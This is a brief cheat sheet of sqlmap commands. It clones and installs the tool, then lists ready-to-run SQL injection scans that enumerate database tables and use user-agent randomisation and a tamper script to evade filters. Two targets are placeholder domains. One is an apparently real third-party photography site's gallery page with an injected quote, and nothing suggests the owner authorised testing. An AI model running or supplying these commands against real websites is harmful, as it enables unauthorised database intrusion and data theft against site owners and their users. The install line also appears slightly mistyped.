SQLMAP commands
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
pip install -r requirements
python sqlmap.py -u http://www.example.com/?p=FUZZ --tables --random-agent --tamper=space2comment
OR
python sqlmap.py -u http://example.in/courses.php?sub_name=FUZZ --tables --random-agent --dbms=mysql --time-sec 5 --risk 1 --level 2 --no-cast
python sqlmap.py -u https://www.michaelkenna.com/gallery.php?id=60%27 --tables --random-agent --dbms=mysql --time-sec 5 --risk 1 --level 2 --no-cast --tamper=space2comment